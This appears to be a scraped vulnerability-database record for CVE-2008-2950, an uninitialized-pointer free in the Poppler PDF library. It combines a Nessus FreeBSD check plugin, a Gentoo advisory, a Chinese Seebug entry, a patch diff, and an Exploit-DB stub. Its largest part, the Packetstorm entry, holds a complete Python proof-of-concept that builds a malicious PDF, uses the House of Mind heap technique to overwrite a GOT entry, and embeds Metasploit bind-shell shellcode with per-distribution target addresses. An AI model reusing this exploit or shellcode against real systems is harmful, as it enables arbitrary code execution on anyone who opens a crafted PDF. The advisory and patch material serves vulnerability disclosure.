script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:poppler\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"poppler<0.8.4_2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:23", "bulletinFamily": "exploit", "description": "", "modified": "2008-07-10T00:00:00", "published": "2008-07-10T00:00:00", "href": "https://packetstormsecurity.com/files/68074/poppler-poc.txt.html", "id": "PACKETSTORM:68074", "type": "packetstorm", "title": "poppler-poc.txt", "sourceData": "`hi. \nI was in doubt about releasing this because of there is no official patch. \nI suppose at this point anyone could accomplish the same thing so, again \nI'm in doubt. \nA friend once told me that if in doubt take your pants off. I've already \ntried that and I didn't earn no resolution to my conflict so.. I thought I \nshould try the internet version of that strategy. So here we are, enjoy... \nf/ \n \n''' \n#OCERT ADV \n#2008-007 libpoppler uninitialized pointer \n \nDescription: \n \nThe poppler PDF rendering library suffers a memory management bug which \nleads to arbitrary code execution. \n \nThe vulnerability is present in the Page class constructor/destructor. The \npageWidgets object is not initialized in the Page constructor if specific \nconditions are met, but it is deleted afterwards in the destructor \nregardless of its initialization. \n \nSpecific PDF files can be crafted which allocate arbitrary memory to \ntrigger the vulnerability. \n \nA new poppler version addressing the issue is scheduled to be released on \nJuly 30th according to maintainer. \n \nThe following patch fixes the issue: \n \ndiff --git a/poppler/Page.cc b/poppler/Page.cc \nindex b28a3ee..72a706b 100644 \n--- a/poppler/Page.cc \n+++ b/poppler/Page.cc \n@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, \nPDFRectangle *box) { \n \nPage::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form \n*form) { \nObject tmp; \n- \n+ pageWidgets = NULL; //Security fix \nok = gTrue; \nxref = xrefA; \nnum = numA; \n \nAffected version: \n \nPoppler <= 0.8.4 \n \nFixed version: \n \nPoppler, N/A \n \nCredit: vulnerability report, patch and PoC code received from Felipe \nAndres Manzano <fmanzano [at] fceia [dot] unr [dot] edu [dot] ar>. \n \nCVE: CVE-2008-2950 \nTimeline: \n \n2008-06-27: vulnerability report received \n2008-06-28: contacted poppler maintainers and affected vendors \n2008-06-30: maintainer confirms issue and patch \n2008-07-07: advisory release \n \nReferences: \n \nPermalink: \nhttp://www.ocert.org/advisories/ocert-2008-007.html \n \n \n####END OCERT \n \n \nSumary: \n======= \n \nThe libpoppler pdf rendering library, can free uninitialized pointers, \nleading to arbitrary code execution. This vulnerability results from \nmemory management bugs in the Page class constructor/destructor. \n \n \nTechnical Description - Exploit/Concept Code: \n============================================= \n \nTests were performed using libpoppler util pdftotext taken from \ngit://git.freedesktop.org/git/poppler/poppler. \nOther version where tried succesfully (the ones shiped with \ndebian/gentoo). \n \nIn the initialization of a Page object and under certain conditions a \nmember object skips initialization, but then is eventualy deleted. This \ncan be conducted to the situation in which an arbitrary pointer is \npassed to the libc free and so the it gets apropiate for the malloc \nmaleficarum to enter the scene. \n \nLook at the Page class constructor on Page.cc:231. First at the begining \nof the function the member object pageWidgets isnt initialized then it \ntries to check if the type of the annotations proposed on the pdf file \nar correct; if not it bails out to the label err2. Note that is some \nincorcondance on the type of the anotation arise the member variable \npageWidgets is never initialized! \n \nPage::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form \n*form) { \nObject tmp; \n[...] \n// annotations \npageDict->lookupNF(\"Annots\", &annots); \nif (!(annots.isRef() || annots.isArray() || annots.isNull())) { \nerror(-1, \"Page annotations object (page %d) is wrong type (%s)\", \nnum, annots.getTypeName()); \nannots.free(); \ngoto err2; \n} \n \n// forms \npageWidgets = new FormPageWidgets(xrefA, this->getAnnots(&tmp),num,form); \ntmp.free(); \n[...] \nerr2: \nannots.initNull(); \nerr1: \ncontents.initNull(); \nok = gFalse; \n} \n \nBut in the Page class destructor, Page.cc:309, pageWidgets is deleted \nwithout any consideration. The Page destructor is inmediatelly called \nafter the erroneous Page construction. \n \nPage::~Page() { \ndelete pageWidgets; \ndelete attrs; \nannots.free(); \ncontents.free(); \n} \n \n \nIt is worth mentioning that the pdf rendering scenario is friendly with \nthe heap massage technics because you will find lots of ways to allocate \nor allocate/free memory in the already probided functionality. In the \nPOC I have used repetidely the 'name' of the fields of a pdf dictionary \nto allocate memory. Each name allocates up to 127bytes and apparently \nthere is no limit in the number of fields. \n \n \nThe following excerpt is a sample verification of the existence of \nthe problem : \n \nlocalhost expl-poppler # python poppler-exploit-rc8.py gentoo-pdftotext \n>test.pdf \nlocalhost expl-poppler # pdftotext test.pdf \nError: PDF file is damaged - attempting to reconstruct xref table... \nError: Annotation rectangle is wrong type \nError: Bad bounding box for annotation \nError: Bad bounding box for annotation \nError: Bad bounding box for annotation \nError: Bad bounding box for annotation \nError: Bad bounding box for annotation \nError: Page annotations object (page 3) is wrong type (integer) \nError: Page count in top-level pages object is incorrect \nError: Couldnt read page catalog \nTrace/breakpoint trap \n \n:) \n \n \nFurther research should be done to accomodate the heap for other \napplications like evince: \nlocalhost expl-poppler # evince test.pdf \n \n(evince:8912): GnomeUI-WARNING **: While connecting to session manager: \nAuthentication Rejected, reason : None of the authentication protocols \nspecified are supported and host-based authentication failed. \n \n** (evince:8912): WARNING **: Service registration failed. \n \n** (evince:8912): WARNING **: Did not receive a reply. Possible causes \ninclude: the remote application did not send a reply, the message bus \nsecurity policy blocked the reply, the reply timeout expired, or the \nnetwork connection was broken. \nError: PDF file is damaged - attempting to reconstruct xref table... \nError: Annotation rectangle is wrong type \nError: Bad bounding box for annotation \nError: Bad bounding box for annotation \nError: Bad bounding box for annotation \nError: Bad bounding box for annotation \nError: Bad bounding box for annotation \nError: Page annotations object (page 3) is wrong type (integer) \n*** glibc detected *** evince: munmap_chunk(): invalid pointer: 0x08100468 \n*** \n \nNote that 0x08100468 is still a provided pointer. But in this try some \nmalloc structure like _heap_info (see. house of mind) is not correctly \naligned any more. Maybe evince-thumbnailer which is (probably \nmonothreaded) is an easier target. \n \n \nPatch \n===== \n \ndiff --git a/poppler/Page.cc b/poppler/Page.cc \nindex b28a3ee..72a706b 100644 \n--- a/poppler/Page.cc \n+++ b/poppler/Page.cc \n@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, \nPDFRectangle *box) { \n \nPage::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form \n*form) { \nObject tmp; \n- \n+ pageWidgets = NULL; //Security fix \nok = gTrue; \nxref = xrefA; \nnum = numA; \n \n \nPOC: \n=== \n \nWritten in pyploit. It can be used 2 ways , one selecting a preconfigured \ntarget like *gentoo-pdftotext* or the other in which you could pass some \nmalloc/free execution trace moddifing parameters. \n \n''' \n########################################################################## \n#### Felipe Andres Manzano * fmanzano@fceia.unr.edu.ar #### \n#### some shit on http://felipe.andres.manzano.googlepages.com/home #### \n########################################################################## \n \nimport struct \nimport struct \nimport math \nimport os \n \nimport sys \n \n## print \"%.400f\"%d wont work :( ... so a quick double printing class \nclass Doubles: \ndef __init__(self, precision=400): \nself.precision=precision \n \ndef pdficateint(self,i1,i2): \ns = struct.pack(\"@L\",i1) + struct.pack(\"@L\",i2) \nreturn self.pdficatestr(s) \n \ndef pdficate(self,s): \nrslt = \" \" \nfor pos in range (0,len(s)/8): \nrslt+=self.pdficatestr(s[(pos*8):(pos*8)+8])+\" \" \nreturn rslt; \n \ndef pdficatestr(self, s): \nd = struct.unpack(\"d\",s)[0] \nrslt=\" \" \nif(d<0.0): \nrslt+=\"-\" \nd=-d \nrslt+=\"%d.\"%int(math.floor(d)) \nmyd=math.floor(d) \nscale=0.1 \nnines=0 \nfor p in range(1,self.precision): \nfor i in range(1,10): \nif (myd+scale*i) > d: \ni-=1 \nbreak \nif i==9: \nif nines>6: \nreturn rslt \nelse: \nnines+=1 \nelse: \nnines=0 \nrslt+=(\"%02d\"%i)[1] \nmyd+=scale* i \nscale=scale*0.1 \nreturn rslt \n \n##From Malloc maleficarum \n##http://packetstormsecurity.org/papers/attack/MallocMaleficarum.txt \nclass HouseOfMind: \n \nHEAP_MAX_SIZE=(1024*1024) \nJMP='\\xeb' \nNOP='\\x90' \nPAD='\\x00' \nPREV_INUSE=0x1 \nIS_MMAPPED=0x2 \nNON_MAIN_ARENA=0x4 \ndef __init__(self, base, where, payload, entrypoint): \nself.base=base \nself.where=where-0xc \nself.heap_info = (base+self.HEAP_MAX_SIZE-1)& ~(self.HEAP_MAX_SIZE-1) \nself.payload=payload \nself.entrypoint=entrypoint \nself.chunkaddress=0 \nif (self.entrypoint > 0xff - 8): \nthrow \n \n## lendian, 32bit only \n## See The Malloc Maleficarum / House of Mind \ndef mind(self): \nrslt = \"\" \n#first we add padding to reach the next Heap border \nrslt+=self.PAD*(self.heap_info-self.base) \n \n#now we add a _heap_info pinting to a malloc_state of our own \n#and dictating a generous size for this *heap* \n##arena.c:59 //struct _heap_info \nrslt += struct.pack(\"<L\", self.heap_info + 16) # Arena for this heap. \nrslt += struct.pack(\"<L\", 0x0000000) # Previous heap. (BUG: Don't \nknow what M does with this) \nrslt += struct.pack(\"<L\", 0x7000000) # Current size in bytes. \nrslt += struct.pack(\"<L\", 0x7000000) # Size in bytes that has been \nmprotected PROT_READ|PROT_WRITE \n#here arena.c suggest some padding. We just don't do it. \n \n \n#now we add the malloc_state of our own \n##malloc.c:2317 //struct malloc_state \nrslt += struct.pack(\"<L\", 0x00000000) # mutex for \nserializing access * 0 -> unlocked. \nrslt += struct.pack(\"<L\", 0x000ffff) # Flags * We need \nNONCONTIGUOUS_BIT to be on for passing \n# condition on malloc.c:@@@@@ \n \n#Note: We assume not Thread's stats# \n \nrslt += struct.pack(\"<L\", 0x00000000)*10 #Fastbins * We \ndon use them. \nrslt += struct.pack(\"<L\", 0x00000000) #Base of the \ntopmost chunk--not otherwise kept in a bin \n#We need it to be \ndifferent to our \nchunk pointer for \n#passing condition \non malloc.c:@@@@, \n0 is safe enough \nrslt += struct.pack(\"<L\", 0x00000000) #The remainder from \nthe most recent split of a small request \n \n#Here it come the bins \n##The first one is the Unsorted bin! \n##Free will write the *chunk* to the containing address +0xc; so it \n##shout point to the GOT pointer to 'overload' -0xc \nrslt += struct.pack(\"<L\", self.where); \n \nrslt += struct.pack(\"<L\", 0x0000000)* 253 #All the other \nunused bins go to 0 * ~ \nrslt += struct.pack(\"<L\", 0x00000000)*4 #Bitmap of \nbins \n \nrslt += struct.pack(\"<L\", 0x00000000) #Linked list next \nmalloc_state \n \n##Memory allocated from the system in this arena. \nrslt += struct.pack(\"<L\", 0x70000000) #system_mem * Need to \nbe big enough for passing the \n#condition on malloc:@@@@ \nrslt += struct.pack(\"<L\", 0x00000000) #max_system_mem ?? \n \n#needed for chunk aligment \nrslt += self.PAD*4 \n \n#CHUNKS \n# An allocated chunk looks like this: \n# \n# chunk-> \n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n# | Size of previous chunk, if allocated \n| | \n# \n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n# | Size of chunk, in bytes \n|M|P| \n# mem-> \n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n# | User data starts here... \n. \n# . \n. \n# . (malloc_usable_size() bytes) \n. \n# . \n| \n#nextchunk-> \n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n# | Size of chunk \n| \n# \n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n \n \n#chunk 0 There isn't a single reason for this to exist * \nwabaaaaaaaaaa! \n# rslt += struct.pack(\"<L\", 16) #Size of previous chunk * \nUNUSED \n# rslt += struct.pack(\"<L\", 64) #Size of chunk, in bytes. \nNo flags \n# rslt += self.PAD*(64-8) \n \n#chunk 1 THE CHAMP \nrslt += \n\"\\x40\"+self.JMP+struct.pack(\"B\",5+self.entrypoint)+self.PAD \n#Size of previous chunk *DOESN'T MATTER! \nrslt += \nstruct.pack(\"<L\",8+len(self.payload)|self.PREV_INUSE|self.NON_MAIN_ARENA) \n# Size of this chunk \n#TODO: \nExplain \nflags, \nlink \ncode \n \n##Save the chunk1 address \nself.chunkaddress= self.base + len(rslt) \nrslt += self.payload #payload (payload[entrypoint] should \ncontain shellcode)! \n \n#chunk 2 THE LAST? \nrslt += struct.pack(\"<L\",8+len(self.payload)) #Size of \nprevious chunk \n#TODO: link where \nit is checked \n \nrslt += struct.pack(\"<L\",64|self.PREV_INUSE|self.NON_MAIN_ARENA) \n#Size of this chunk \n#Neds \nto \nbe \ngreater \nthan \n2 \n* \nSIZE_SZ, \n#TODO: \nExplain \nflags, \nlink \ncode \n \nrslt += self.PAD*(64-8) \n \n#chunk 3 THE LAST! \nrslt += struct.pack(\"<L\",64) #Size of previous chunk \nrslt += struct.pack(\"<L\",self.PREV_INUSE) #Size of this chunk * \nHere we need just the PREV_INUSE bit set \nreturn rslt \n#no need no payload \n \n#For constructing a minimal pdf file \nclass PDFObject: \ndef __init__(self,toks): \nself.toks=toks \nself.n=0 \nself.v=0 \n \ndef __str__(self): \ns=\"%d %d obj\\n\"%(self.n,self.v) \nfor t in self.toks: \ns+=t.__str__() \ns+=\"\\nendobj\\n\" \nreturn s \n \n \nclass PDFDict(): \ndef __init__(self): \nself.dict = [] \n \ndef add(self,name,obj): \nself.dict.append((name,obj)) \n \ndef __str__(self): \ns=\"<<\" \nfor name,obj in self.dict: \ns+=\"/%s %s\\n\"%(name,obj) \ns+=\">>\" \nreturn s \n \nclass PDFName(): \ndef __init__(self,s): \nself.s=s \ndef __str__(self): \nreturn \"/%s\"%self.s \n \nclass PDFString(): \ndef __init__(self,s): \nself.s=s \ndef __str__(self): \nreturn \"(%s)\"%self.s \n \nclass PDFRef(): \ndef __init__(self,obj): \nself.obj=obj \ndef __str__(self): \nreturn \"%d %d R\"%(self.obj.n,self.obj.v) \n \n \nclass PDFDoc(): \ndef __init__(self): \nself.objs=[] \n \ndef add(self,obj): \nobj.v=0 \nobj.n=1+len(self.objs) \nself.objs.append(obj) \n \ndef _header(self): \nreturn \"%PDF-1.5\\n\" \n \ndef __str__(self): \ndoc1 = \"%PDF-1.5\\n\" \nxref = {} \nfor obj in self.objs: \nxref[obj.n] = len(doc1) \ndoc1=doc1+obj.__str__() \nposxref=len(doc1) \ndoc1+=\"xref\\n\" \ndoc1+=\"0 %d\\n\"%len(self.objs) \ndoc1+=\"0000000000 65535 f\\n\" \nfor xr in xref.keys(): \ndoc1+= \"%010d %05d n\\n\"%(xref[xr],0) \ndoc1+=\"trailer\\n\" \ntrailer = PDFDict() \ntrailer.add(\"Size\",len(self.objs)) \ntrailer.add(\"Root\",\"2 0 R\") \ndoc1+=trailer.__str__() \ndoc1+=\"\\nstartxref\\n%d\\n\"%posxref \ndoc1+=\"%%EOF\\n\\n\" \n \nreturn doc1 \n \n#The ... \"POC\" \nclass PopplerExpl: \n \ndef __init__(self,shellcode): \nself.shellcode=shellcode \nself.d = Doubles() \n \n#this wraps the shellcode in an encoding supported by 'doubles' \ndef wrap(self,scode,where): \nwrapscode = '\\xb8' + struct.pack(\"<L\",where)+\"\\x90\"*3 \n#movl where, %eax;nop;nop;nop \nfor c in scode: \nwrapscode += \"\\xc6\\x00%c\\x40\"%c \n#movb $c, (%eax); inc %eax \nif (len(scode)%2!=0): \nwrapscode += \"\\xc6\\x00\\xcc\\x40\" \n#movb $0xcc, (%eax); inc %eax \nwrapscode += \"\\xb8\" + struct.pack(\"<L\",where)+\"\\x90\"*3 \n#movl where, %eax;nop;nop;nop \nwrapscode += \"\\x50\\xc3\" \n#push %eax;ret \nreturn wrapscode + '\\x00'*(1000-len(wrapscode)) \n#padding to a supported size \n \ndef make(self,base,got,massage=None): \n#here we generate the house of mind thingy \n#The House Of Mind instance. \n#Te first word es passed tu a gfree so we put 0 so we ignore that \nfree. \nhm = HouseOfMind(base, got, \"\\x00\"*16+ \nself.wrap(self.shellcode,base), 16) \nmind = hm.mind() \n \ndoc = PDFDoc() \ndoc.add(PDFObject([\"<</Length 3>>\\nstream...\\nendstream\\n\"])) \ncatalog = PDFDict() \ncatalog.add(\"Type\", PDFName(\"Catalog\")) \ncatalog.add(\"Outlines\", \"3 0 R\") \ncatalog.add(\"Pages\", \"4 0 R\") \ncatalog.add(\"AcroForm\", \"<</Fields [ 7 0 R ]>>\") \n \n#for i in range(0,1000): \n# catalog.add( \"C\"*82 + \"%05d\"%i, 0) \n \noutlines = PDFDict() \noutlines.add(\"Type\", PDFName(\"Outlines\")) \noutlines.add(\"Count\",0) \n \npages = PDFDict() \npages.add(\"Type\", PDFName(\"Pages\")) \npages.add(\"Kids\",\"[ 8 0 R 6 0 R 5 0 R ]\") \npages.add(\"Count\",\"3\") \n \ndoc.add(PDFObject([catalog])) \ndoc.add(PDFObject([outlines])) \ndoc.add(PDFObject([pages])) \n \npage1 = PDFDict() \npage1.add(\"Type\", PDFName(\"Page\")) \npage1.add(\"Parent\", \"4 0 R\") \npage1.add(\"MediaBox\",\"[ 0 0 612 792 ]\") \npage1.add(\"Contents\", \"1 0 R\") \npage1.add(\"Resources\", \"<< /ProcSet 6 0 R >>\") \npage1.add(\"Annots\", \"0\") \n \n#malloc-fill-free lots of chunks of the size then used by Page \nclass(88) \nfor pagesize in range(88,126): \npayload = \n(\"\".join([\"#%02x\"%ord(struct.pack(\"@L\",hm.chunkaddress)[i]) \nfor i in range (0,4)]))*19 \npayload += \"B\"*(pagesize-(len(payload)/3)) \nfor i in range(0,10): \npage1.add(payload, 0) \n \ndoc.add(PDFObject([page1])) \n \npage1 = PDFDict() \npage1.add(\"Type\", PDFName(\"Page\")) \npage1.add(\"Parent\", \"4 0 R\") \npage1.add(\"MediaBox\",\"[ 0 0 612 792 ]\") \npage1.add(\"Contents\", \"1 0 R\") \npage1.add(\"Resources\", \"<< /ProcSet 6 0 R >>\") \npage1.add(\"Annots\", \"[7 0 R 7 0 R 7 0 R 7 0 R]\") \n \n#massage session 1 \nsize=127 \nfor i in range(0,massage[0]): \npage1.add( \"A\"*(size-5)+(\"%05d\"%(i)), \"B\"*size) \n \ndoc.add(PDFObject([page1])) \nannots = PDFDict() \nannots.add(\"Subtype\",\"/Text\") \n \nannots.add(\"BS\", \"<</D [ \"+ \n\"0 \"*massage[1] + \nself.d.pdficate(mind)+ \n#more massage>? \n\"0.0 \"*massage[2] + \" ]>>\") \n \nannots.add(\"FT\", \"/Tx\") \ndoc.add(PDFObject([annots])) \n \npage1 = PDFDict() \npage1.add(\"Type\", PDFName(\"Page\")) \npage1.add(\"Parent\", \"4 0 R\") \npage1.add(\"MediaBox\",\"[ 0 0 612 792 ]\") \npage1.add(\"Contents\", \"1 0 R\") \npage1.add(\"Resources\", \"<< /ProcSet 6 0 R >>\") \npage1.add(\"Annots\", \"[7 0 R]\") \ndoc.add(PDFObject([page1])) \ndoc.add(PDFObject([\"<<>>\"])) \ndoc.add(PDFObject([\"[ /PDF ]\"])) \nreturn doc.__str__() \n \n \n##Main \n## Not every shellcode will work by now \n## Only the ones that taken by 8bytes form an ieee754 double presicion float \n## with an exponent not too positive ... :) \n \n## linux_ia32_bind - LPORT=4444 Size=84 Encoder=None http://metasploit.com \nscode = \"\\x31\\xdb\\x53\\x43\\x53\\x6a\\x02\\x6a\\x66\\x58\\x99\\x89\\xe1\\xcd\\x80\\x96\" \nscode += \"\\x43\\x52\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe1\\x6a\\x66\\x58\\x50\\x51\\x56\" \nscode += \"\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xd1\\xe3\\xcd\\x80\\x52\\x52\\x56\\x43\\x89\\xe1\" \nscode += \"\\xb0\\x66\\xcd\\x80\\x93\\x6a\\x02\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\" \nscode += \"\\x0b\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\" \nscode += \"\\x89\\xe1\\xcd\\x80\" \n \n#expl = PopplerExpl( ('\\xcc'+'\\x90')*((160-16)/2)) \nexpl = PopplerExpl(scode) \n \ntargets = { \n\"gentoo-pdftotext\":(0x08100000, 0x804c014, 1863, 20, 400), \n\"debian4-pdftotext\":(0x08100000, 0x804bb18, 1879, 33, 400), \n\"gentoo-evince-thumbnailer\": (0x8100000, 0x080712c4, 907, 34, 200), \n \n} \n \nif len( sys.argv )==1: \nprint \"Comments -> fmanzano@fceia.unr.edu.ar\" \nprint \"Usage 1:\" \nprint \" %s \"%sys.argv[0], targets.keys() \nprint \"Usage 2:\" \nprint \" %s massage1 massage2 massage3 base got\"%sys.argv[0] \nprint \" The idea here is to align the _heap_info struct that \ncommences with 0x08?00010 \" \nprint \" to the address 0x8?0000. For this pourpose move \nmassage1/2/3. \" \nprint \" THIS STUPIDLY SIMPLE METHOD WOULD WORK FOR VERY FEW \nAPPS !\" \nprint \" base is the 1024*1024 bytes aligned address to which we \nare trying to align everything\" \nprint \" got is the addres of the got where the thing is going \nto write the shellcode address\" \nprint \" BTW by now the shellcode is nop;int 3;nop...grooovy!.. \nNOT\" \nelif len( sys.argv )>2: \nprint expl.make(int(sys.argv[4][2:],16), int(sys.argv[5][2:],16), \n(int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))) \nelse: \n#base: the expected heap limit (08100000,08200000,....08f00000... ) \n#got: address of the got entry to change \n#chinesse massage \nbase,got,massage1,massage2,massage3 = targets[sys.argv[1]] \nprint expl.make(base,got,(massage1,massage2,massage3)) \n \n \n#thnks A \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/68074/poppler-poc.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:25", "bulletinFamily": "unix", "description": "### Background\n\nPoppler is a cross-platform PDF rendering library originally based on Xpdf. \n\n### Description\n\nFelipe Andres Manzano reported a memory management issue in the Page class constructor/destructor. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted PDF file with a Poppler-based PDF viewer such as Gentoo's Xpdf, Epdfview, or Evince, potentially resulting in the execution of arbitrary code with the privileges of the user running the application. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll poppler users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/poppler-0.6.3-r1\"", "modified": "2008-07-08T00:00:00", "published": "2008-07-08T00:00:00", "id": "GLSA-200807-04", "href": "https://security.gentoo.org/glsa/200807-04", "type": "gentoo", "title": "Poppler: User-assisted execution of arbitrary code", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T21:37:11", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 30107\r\nCVE ID\uff1aCVE-2008-2950\r\nCNCVE ID\uff1aCNCVE-20082950\r\n \r\nPoppler\u662f\u4e00\u6b3ePDF\u6e32\u67d3\u5e93\u3002\r\nPoppler PDF\u6e32\u67d3\u5e93\u5b58\u5728\u4e00\u4e2a\u5185\u5b58\u7ba1\u7406\u9519\u8bef\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\u6f0f\u6d1e\u5b58\u5728\u4e8e\u9875\u7c7b\u6784\u9020/\u89e3\u6784\u4e2d\uff0c\u5728\u7279\u5b9a\u6761\u4ef6\u4e0bpageWidgets\u5bf9\u8c61\u5728\u9875\u6784\u9020\u4e2d\u4e0d\u6b63\u786e\u521d\u59cb\u5316\uff0c\u5e76\u5728\u4e4b\u540e\u89e3\u6784\u8fc7\u7a0b\u4e2d\u6ca1\u6709\u68c0\u67e5\u662f\u5426\u521d\u59cb\u5316\u800c\u76f4\u63a5\u5220\u9664\uff0c\u7279\u6b8a\u6784\u5efa\u7684PDF\u6587\u4ef6\u53ef\u5bfc\u81f4\u5206\u914d\u4efb\u610f\u5185\u5b58\u800c\u89e6\u53d1\u6b64\u6f0f\u6d1e\u3002\u53ef\u80fd\u5bfc\u81f4\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\n\npoppler 0.8.4\n \u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c\uff1a\r\n<a href=http://poppler.freedesktop.org/ target=_blank>http://poppler.freedesktop.org/</a>", "modified": "2008-07-08T00:00:00", "published": "2008-07-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3570", "id": "SSV:3570", "title": "Poppler PDF\u6e32\u67d3\u5e93\u9875\u7c7b\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "exploitdb": [{"lastseen": "2016-01-31T23:04:20", "bulletinFamily": "exploit", "description": "Poppler <= 0.8.4 libpoppler uninitialized pointer Code Execution PoC. CVE-2008-2950. Local exploit for linux platform", "modified": "2008-07-08T00:00:00", "published": "2008-07-08T00:00:00", "id": "EDB-ID:6032", "href": "https://www.exploit-db.com/exploits/6032/", "type": "exploitdb", "title": "Poppler <= 0.8.4 libpoppler uninitialized pointer Code Execution PoC", "sourceData": "##########################################################################\n#### Felipe Andres Manzano * fmanzano@fceia.unr.edu.ar ####\n#### updates in http://felipe.andres.manzano.googlepages.com/home ####\n##########################################################################\n'''\n\n\nSumary:\n=======\n\nThe libpoppler pdf rendering library, can free uninitialized pointers,\nleading to arbitrary code execution. This vulnerability results from\nmemory management bugs in the Page class constructor/destructor.\n\n\nTechnical Description - Exploit/Concept Code:\n=============================================\n\nTests were performed using libpoppler util pdftotext taken from\ngit://git.freedesktop.org/git/poppler/poppler.\nOther version where tried succesfully (the ones shiped with\ndebian/gentoo).\n\nIn the initialization of a Page object and under certain conditions a\nmember object skips initialization, but then is eventualy deleted. This\ncan be conducted to the situation in which an arbitrary pointer is\npassed to the libc free and so the it gets apropiate for the malloc\nmaleficarum to enter the scene.\n\nLook at the Page class constructor on Page.cc:231. First at the begining\nof the function the member object pageWidgets isnt initialized then it\ntries to check if the type of the annotations proposed on the pdf file\nar correct; if not it bails out to the label err2. Note that is some\nincorcondance on the type of the anotation arise the member variable\npageWidgets is never initialized! \n\nPage::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) {\n Object tmp;\n[...]\n // annotations\n pageDict->lookupNF(\"Annots\", &annots);\n if (!(annots.isRef() || annots.isArray() || annots.isNull())) {\n error(-1, \"Page annotations object (page %d) is wrong type (%s)\",\n\t num, annots.getTypeName());\n annots.free();\n goto err2;\n }\n\n // forms\n pageWidgets = new FormPageWidgets(xrefA, this->getAnnots(&tmp),num,form);\n tmp.free();\n[...]\n err2:\n annots.initNull();\n err1:\n contents.initNull();\n ok = gFalse;\n}\n\nBut in the Page class destructor, Page.cc:309, pageWidgets is deleted\nwithout any consideration. The Page destructor is inmediatelly called\nafter the erroneous Page construction.\n\nPage::~Page() {\n delete pageWidgets;\n delete attrs;\n annots.free();\n contents.free();\n}\n\n\nIt is worth mentioning that the pdf rendering scenario is friendly with\nthe heap massage technics because you will find lots of ways to allocate\nor allocate/free memory in the already probided 